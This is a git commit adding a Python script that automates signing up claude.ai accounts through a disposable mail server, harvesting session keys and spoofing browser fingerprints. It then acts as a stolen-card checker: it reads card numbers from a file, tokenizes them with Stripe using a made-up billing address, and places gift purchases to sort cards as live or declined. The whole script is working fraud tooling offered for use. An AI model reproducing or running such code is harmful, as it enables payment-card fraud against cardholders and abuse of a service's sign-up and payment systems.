frist cm

2026-02-12 21:26:34 +08:00
commit 02d70ac3cd
6 changed files with 755 additions and 0 deletions
--- a/main.py
+++ b/main.py
@@ -0,0 +1,525 @@
+import time
+import uuid
+import random
+import string
+import re
+import json
+import base64
+import requests as standard_requests # 用于普通API交互
+from curl_cffi import requests # 用于模拟指纹
+from urllib.parse import urlparse, parse_qs
+
+# --- 配置区域 (Configuration) ---
+# cloudmail邮件系统配置
+MAIL_API_BASE = "https://xxxxx.com/"  # 替换为你的邮件API域名
+ADMIN_EMAIL = "admin@xxxxx.com"                  # 替换你的管理员邮箱
+ADMIN_PASS = "xxxxx"                       # 替换你的管理员密码
+MAIL_DOMAIN = "xxxxx.com"                        # 你的临时邮箱域名
+
+# Claude 配置
+CLAUDE_URL = "https://claude.ai/api/auth/send_magic_link"
+#
+UA = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
+
+# Stripe Public Key
+STRIPE_PK = "pk_live_51MExQ9BjIQrRQnuxA9s9ahUkfIUHPoc3NFNidarWIUhEpwuc1bdjSJU9medEpVjoP4kTUrV2G8QWdxi9GjRJMUri005KO5xdyD"
+# Gift Product ID
+PRODUCT_ID = "prod_TXU4hGh2EDxASl"
+
+
+class ClaudeAccount:
+    def __init__(self, email, session_key, org_uuid, user_agent):
+        self.email = email
+        self.session_key = session_key
+        self.org_uuid = org_uuid
+        self.user_agent = user_agent
+        self.device_id = str(uuid.uuid4())
+
+class MailSystem:
+    def __init__(self, base_url, admin_email, admin_password):
+        self.base_url = base_url
+        self.token = self._get_token(admin_email, admin_password)
+        self.headers = {"Authorization": self.token}
+    
+    def _get_token(self, email, password):
+        """获取身份令牌，这是我们的通行证"""
+        url = f"{self.base_url}/api/public/genToken"
+        payload = {"email": email, "password": password}
+        try:
+            resp = standard_requests.post(url, json=payload)
+            data = resp.json()
+            if data['code'] == 200:
+                print(f"[+] 令牌获取成功: {data['data']['token'][:10]}...")
+                return data['data']['token']
+            else:
+                raise Exception(f"获取Token失败: {data}")
+        except Exception as e:
+            print(f"[-] 连接邮件系统失败: {e}")
+            exit(1)
+
+    def create_user(self, email_prefix):
+        """在你的系统里注册一个新灵魂"""
+        full_email = f"{email_prefix}@{MAIL_DOMAIN}"
+        url = f"{self.base_url}/api/public/addUser"
+        # 接口要求 list 结构
+        payload = {
+            "list": [
+                {
+                    "email": full_email,
+                    "password": "random_pass_ignoring_this" 
+                }
+            ]
+        }
+        resp = standard_requests.post(url, json=payload, headers=self.headers)
+        if resp.json().get('code') == 200:
+            print(f"[+] 邮箱用户创建成功: {full_email}")
+            return full_email
+        else:
+            print(f"[-] 创建邮箱失败: {resp.text}")
+            return None
+
+    def wait_for_email(self, to_email, retry_count=20, sleep_time=3):
+        """像猎人一样耐心等待猎物出现"""
+        url = f"{self.base_url}/api/public/emailList"
+        payload = {
+            "toEmail": to_email,
+            "sendName": "Anthropic",  # 发件人是 Anthropic 不是 Claude
+            "num": 1,
+            "size": 10,
+            "timeSort": "desc"
+        }
+        
+        print(f"[*] 开始轮询邮件，目标: {to_email}...")
+        
+        for i in range(retry_count):
+            try:
+                resp = standard_requests.post(url, json=payload, headers=self.headers)
+                data = resp.json()
+                
+                if data.get('code') == 200 and data.get('data'):
+                    emails = data['data']
+                    # 检查是否有来自 Claude 的邮件
+                    for email in emails:
+                        # 这里可以加更严格的判断，比如 subject 包含 "sign in"
+                        print(f"[!] 捕获到邮件! 主题: {email.get('subject')}")
+                        return email.get('content') or email.get('text')
+                
+                print(f"[*] 轮询中 ({i+1}/{retry_count})...")
+                time.sleep(sleep_time)
+            except Exception as e:
+                print(f"[-] 轮询出错: {e}")
+                time.sleep(sleep_time)
+        
+        print("[-] 等待超时，未收到邮件。")
+        return None
+
+def extract_magic_link(html_content):
+    """HTML提取出链接"""
+    if not html_content:
+        return None
+    
+    pattern = r'href="(https://claude\.ai/[^"]+)"'
+    match = re.search(pattern, html_content)
+    
+    if match:
+        url = match.group(1)
+        return url.replace("&amp;", "&")
+    return None
+
+
+class StripeTokenizer:
+    def __init__(self, user_agent):
+        self.user_agent = user_agent
+        self.guid = f"{uuid.uuid4()}0a75cf"
+        self.muid = f"{uuid.uuid4()}1d4c1f"
+        self.sid = f"{uuid.uuid4()}eb67c4"
+        self.client_session_id = str(uuid.uuid4())
+        self.elements_session_config_id = str(uuid.uuid4())
+
+    def get_token(self, cc_num, exp_m, exp_y, cvc):
+        """与 Stripe 交互获取 pm_id"""
+        url = "https://api.stripe.com/v1/payment_methods"
+        
+        headers = {
+            "Host": "api.stripe.com",
+            "Content-Type": "application/x-www-form-urlencoded",
+            "Sec-Ch-Ua-Platform": '"Linux"',
+            "User-Agent": self.user_agent,
+            "Accept": "application/json",
+            "Sec-Ch-Ua": '"Google Chrome";v="143", "Chromium";v="143", "Not A(Brand";v="24"',
+            "Sec-Ch-Ua-Mobile": "?0",
+            "Origin": "https://js.stripe.com",
+            "Sec-Fetch-Site": "same-site",
+            "Sec-Fetch-Mode": "cors",
+            "Sec-Fetch-Dest": "empty",
+            "Referer": "https://js.stripe.com/",
+            "Accept-Encoding": "gzip, deflate, br",
+            "Accept-Language": "zh-CN,zh;q=0.9",
+            "Priority": "u=1, i"
+        }
+
+        # 构造完整的 form-data 
+        time_on_page = random.randint(30000, 500000)
+        
+        data = {
+            "type": "card",
+            "card[number]": cc_num,
+            "card[cvc]": cvc,
+            "card[exp_year]": exp_y[-2:] if len(exp_y) == 4 else exp_y,
+            "card[exp_month]": exp_m,
+            "allow_redisplay": "unspecified",
+            "billing_details[address][postal_code]": "91505",
+            "billing_details[address][country]": "US",
+            "billing_details[address][line1]": "3891 Libby Street",
+            "billing_details[address][city]": "Burbank",
+            "billing_details[address][state]": "CA",
+            "billing_details[name]": "Test User",
+            "billing_details[phone]": "",
+            "payment_user_agent": "stripe.js/5766238eed; stripe-js-v3/5766238eed; payment-element; deferred-intent; autopm",
+            "referrer": "https://claude.ai",
+            "time_on_page": str(time_on_page),
+            "client_attribution_metadata[client_session_id]": self.client_session_id,
+            "client_attribution_metadata[merchant_integration_source]": "elements",
+            "client_attribution_metadata[merchant_integration_subtype]": "payment-element",
+            "client_attribution_metadata[merchant_integration_version]": "2021",
+            "client_attribution_metadata[payment_intent_creation_flow]": "deferred",
+            "client_attribution_metadata[payment_method_selection_flow]": "automatic",
+            "client_attribution_metadata[elements_session_config_id]": self.elements_session_config_id,
+            "client_attribution_metadata[merchant_integration_additional_elements][0]": "payment",
+            "client_attribution_metadata[merchant_integration_additional_elements][1]": "address",
+            "guid": self.guid,
+            "muid": self.muid,
+            "sid": self.sid,
+            "key": STRIPE_PK,
+            "_stripe_version": "2025-03-31.basil"
+        }
+
+        try:
+            print(f"[*] 正在向 Stripe 请求 Token: {cc_num[:4]}******{cc_num[-4:]}")
+            resp = requests.post(url, data=data, headers=headers, impersonate="chrome124")
+            
+            if resp.status_code == 200:
+                pm_id = resp.json().get("id")
+                print(f"[+] Stripe Token 获取成功: {pm_id}")
+                return pm_id
+            else:
+                print(f"[-] Stripe 拒绝: {resp.text}")
+                return None
+        except Exception as e:
+            print(f"[-] Stripe 连接错误: {e}")
+            return None
+
+
+class GiftChecker:
+    def __init__(self, account: ClaudeAccount):
+        self.account = account
+
+    def purchase(self, pm_id):
+        """尝试购买 Gift"""
+        url = f"https://claude.ai/api/billing/{self.account.org_uuid}/gift/purchase"
+        
+        headers = {
+            "Host": "claude.ai",
+            "User-Agent": self.account.user_agent,
+            "Content-Type": "application/json",
+            "Accept": "*/*",
+            "Anthropic-Client-Version": "1.0.0",
+            "Anthropic-Client-Platform": "web_claude_ai",
+            "Anthropic-Device-Id": self.account.device_id,
+            "Origin": "https://claude.ai",
+            "Referer": "https://claude.ai/gift",
+            "Cookie": f"sessionKey={self.account.session_key}"
+        }
+
+        payload = {
+            "product_id": PRODUCT_ID,
+            "currency": "USD",
+            "payment_method_id": pm_id,
+            "to_email": self.account.email,
+            "to_name": "",
+            "from_name": "Checker",
+            "from_email": self.account.email,
+            "gift_message": "",
+            "card_color": "clay",
+            "billing_address": {
+                "line1": "3891 Libby Street",
+                "city": "Burbank",
+                "state": "CA",
+                "postal_code": "91505",
+                "country": "US"
+            },
+            "scheduled_delivery_at": None
+        }
+
+        try:
+            print(f"[*] 正在尝试扣款 (Gift Purchase)...")
+            resp = requests.post(url, json=payload, headers=headers, impersonate="chrome124")
+            
+            resp_json = {}
+            try:
+                resp_json = resp.json()
+            except:
+                pass
+
+            if resp.status_code == 200:
+                print("[$$$] 成功! CHARGED! 该卡有效 (Live)!")
+                return "LIVE"
+            elif resp.status_code == 402:
+                err_msg = resp_json.get("error", {}).get("message", "Unknown error")
+                print(f"[-] 支付失败 (402): {err_msg}")
+                
+                if "declined" in err_msg.lower():
+                    return "DECLINED"
+                elif "insufficient" in err_msg.lower():
+                    return "INSUFFICIENT_FUNDS"
+                elif "security code" in err_msg.lower() or "cvc" in err_msg.lower():
+                    print("[!] CCN LIVE (CVC 错误，说明卡号有效)")
+                    return "CCN_LIVE"
+                else:
+                    return "DEAD"
+            else:
+                print(f"[-] 未知响应 Code: {resp.status_code}, Body: {resp.text}")
+                return "ERROR"
+
+        except Exception as e:
+            print(f"[-] 购买请求异常: {e}")
+            return "ERROR"
+
+
+def attack_claude(target_email):
+    """伪装成浏览器发起攻击"""
+    device_id = str(uuid.uuid4())
+    
+    headers = {
+        "Host": "claude.ai",
+        "Anthropic-Anonymous-Id": f"claudeai.v1.{uuid.uuid4()}",
+        "Sec-Ch-Ua-Full-Version-List": '"Google Chrome";v="143.0.7499.105", "Chromium";v="143.0.7499.105", "Not A(Brand";v="24.0.0.0"',
+        "Sec-Ch-Ua-Platform": '"Linux"',
+        "Sec-Ch-Ua": '"Google Chrome";v="143", "Chromium";v="143", "Not A(Brand";v="24"',
+        "Baggage": "sentry-environment=production,sentry-release=ce5600af514463a166f4cd356a6afbc46ee5cd3d,sentry-public_key=58e9b9d0fc244061a1b54fe288b0e483,sentry-trace_id=7bdc872994f347d6b5a610a520f40401,sentry-org_id=1158394",
+        "Anthropic-Client-Sha": "ce5600af514463a166f4cd356a6afbc46ee5cd3d", 
+        "Content-Type": "application/json",
+        "Anthropic-Client-Platform": "web_claude_ai",
+        "Anthropic-Device-Id": device_id,
+        "Anthropic-Client-Version": "1.0.0",
+        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36",
+        "Origin": "https://claude.ai",
+        "Referer": "https://claude.ai/login?returnTo=%2Fonboarding",
+        "Accept-Encoding": "gzip, deflate, br",
+        "Accept-Language": "zh-CN,zh;q=0.9",
+        "Priority": "u=1, i"
+    }
+
+    payload = {
+        "utc_offset": -480,
+        "email_address": target_email,
+        "login_intent": None,
+        "locale": "en-US",
+        "oauth_client_id": None,
+        "source": "claude"
+    }
+
+    try:
+        print(f"[*] 正在向 Claude 发送 Magic Link 请求: {target_email}")
+        session = requests.Session()
+        response = session.post(
+            CLAUDE_URL,
+            json=payload,
+            headers=headers,
+            impersonate="chrome124"
+        )
+        
+        if response.status_code == 200:
+            print("[+] 请求成功，Claude 已发信。")
+            return True
+        elif response.status_code == 429:
+            print("[-] 被限流了 (Rate Limited)。")
+        else:
+            print(f"[-] 请求失败 Code: {response.status_code}, Body: {response.text}")
+            
+    except Exception as e:
+        print(f"[-] 发生异常: {e}")
+    
+    return False
+
+def finalize_login(magic_link_fragment):
+    """
+    完成最后一步：无需浏览器，直接交换 sessionKey。
+    magic_link_fragment 格式: https://claude.ai/magic-link#token:base64_email
+    返回 ClaudeAccount 对象
+    """
+    
+    # 1. 外科手术式拆解 Hash
+    if '#' in magic_link_fragment:
+        fragment = magic_link_fragment.split('#')[1]
+    else:
+        fragment = magic_link_fragment
+
+    if ':' not in fragment:
+        print("[-] 链接格式错误: 找不到 token 和 email 的分隔符")
+        return None
+
+    # 分割 nonce 和 base64_email
+    nonce, encoded_email = fragment.split(':', 1)
+    
+    try:
+        decoded_email = base64.b64decode(encoded_email).decode('utf-8')
+        print(f"[*] 解析成功 -> Email: {decoded_email} | Nonce: {nonce[:8]}...")
+    except:
+        print(f"[*] 解析成功 -> Nonce: {nonce[:8]}...")
+
+    # 2. 构造最终 payload
+    verify_url = "https://claude.ai/api/auth/verify_magic_link"
+    
+    payload = {
+        "credentials": {
+            "method": "nonce",
+            "nonce": nonce,
+            "encoded_email_address": encoded_email
+        },
+        "locale": "en-US",
+        "oauth_client_id": None,
+        "source": "claude"
+    }
+
+    # 3. 伪造指纹头
+    device_id = str(uuid.uuid4())
+    headers = {
+        "Host": "claude.ai",
+        "Content-Type": "application/json",
+        "Origin": "https://claude.ai",
+        "Referer": "https://claude.ai/magic-link",
+        "User-Agent": UA,
+        "Accept": "*/*",
+        "Accept-Language": "zh-CN,zh;q=0.9",
+        "Anthropic-Client-Version": "1.0.0",
+        "Anthropic-Client-Platform": "web_claude_ai",
+        "Anthropic-Device-Id": device_id,
+        "Sec-Fetch-Dest": "empty",
+        "Sec-Fetch-Mode": "cors",
+        "Sec-Fetch-Site": "same-origin",
+        "Priority": "u=1, i"
+    }
+
+    try:
+        print(f"[*] 正在交换 SessionKey...")
+        session = requests.Session()
+        response = session.post(
+            verify_url,
+            json=payload,
+            headers=headers,
+            impersonate="chrome124"
+        )
+
+        if response.status_code == 200:
+            data = response.json()
+            # 1. 提取 SessionKey
+            session_key = response.cookies.get("sessionKey")
+            
+            if not session_key:
+                for name, value in response.cookies.items():
+                    if name == "sessionKey":
+                        session_key = value
+                        break
+            
+            if not session_key:
+                print("[-] 请求成功 (200)，但未在 Cookie 中找到 sessionKey。")
+                print(f"Response: {str(data)[:200]}...")
+                return None
+            
+            # 2. 提取 Org UUID
+            try:
+                org_uuid = data['account']['memberships'][0]['organization']['uuid']
+                email = data['account']['email_address']
+                print(f"[+] 登录成功。OrgID: {org_uuid}")
+                return ClaudeAccount(email, session_key, org_uuid, UA)
+            except KeyError as e:
+                print(f"[-] 无法提取 Organization UUID，结构可能变了: {e}")
+                print(f"Response keys: {data.keys() if isinstance(data, dict) else type(data)}")
+                return None
+            
+        else:
+            print(f"[-] 交换失败 Code: {response.status_code}")
+            print(f"Body: {response.text}")
+            return None
+
+    except Exception as e:
+        print(f"[-] 发生异常: {e}")
+        return None
+
+
+# --- 主流程 (The Ritual) ---
+if __name__ == "__main__":
+    # 1. 初始化邮件系统
+    mail_sys = MailSystem(MAIL_API_BASE, ADMIN_EMAIL, ADMIN_PASS)
+    
+    # 2. 生成随机邮箱并注册
+    # 生成 10 位随机字符作为邮箱前缀
+    random_prefix = ''.join(random.choices(string.ascii_lowercase + string.digits, k=10))
+    target_email = mail_sys.create_user(random_prefix)
+    
+    if target_email:
+        # 3. 发送 Magic Link
+        if attack_claude(target_email):
+            
+            # 4. 等待并提取链接
+            email_content = mail_sys.wait_for_email(target_email)
+            
+            if email_content:
+                magic_link = extract_magic_link(email_content)
+                if magic_link:
+                    print(f"[+] 捕获 Magic Link: {magic_link}")
+                    
+                    # --- 终极步骤：登录获取 Account ---
+                    account = finalize_login(magic_link)
+                    
+                    if account:
+                        print("\n" + "="*50)
+                        print(f"[+] REGISTERED SUCCESSFUL")
+                        print(f"Email: {account.email}")
+                        print(f"SessionKey: {account.session_key}")
+                        print(f"OrgUUID: {account.org_uuid}")
+                        
+                        with open("accounts.txt", "a") as f:
+                            f.write(f"{account.email}|{account.session_key}|{account.org_uuid}\n")
+                            
+                        print("="*50 + "\n")
+                        
+                        # --- CC Checker 流程 ---
+                        # 从 cards.txt 读取卡片列表 (格式: CARD|MM|YY|CVC)
+                        cards = []
+                        try:
+                            with open("cards.txt", "r") as f:
+                                for line in f:
+                                    line = line.strip()
+                                    if line and not line.startswith("#"):
+                                        cards.append(line)
+                            print(f"[*] 从 cards.txt 读取到 {len(cards)} 张卡片")
+                        except FileNotFoundError:
+                            print("[*] 未找到 cards.txt，跳过 CC Checker")
+                        
+                        if cards:
+                            tokenizer = StripeTokenizer(account.user_agent)
+                            checker = GiftChecker(account)
+                            
+                            for card_line in cards:
+                                cc, mm, yy, cvc = card_line.split("|")
+                                
+                                # 1. 获取 Stripe Token
+                                pm_id = tokenizer.get_token(cc, mm, yy, cvc)
+                                
+                                if pm_id:
+                                    # 2. 尝试购买
+                                    result = checker.purchase(pm_id)
+                                    
+                                    # 3. 输出结果
+                                    print(f"Card: {cc[:4]}... -> {result}")
+                                    
+                                    # 不要跑太快，防止封 Session
+                                    time.sleep(2)
+                    else:
+                        print("[-] 获取 Account 失败。")
+                else:
+                    print("[-] 邮件内容中未找到链接，可能格式变了？")
+            else:
+                print("[-] 任务失败：未收到邮件。")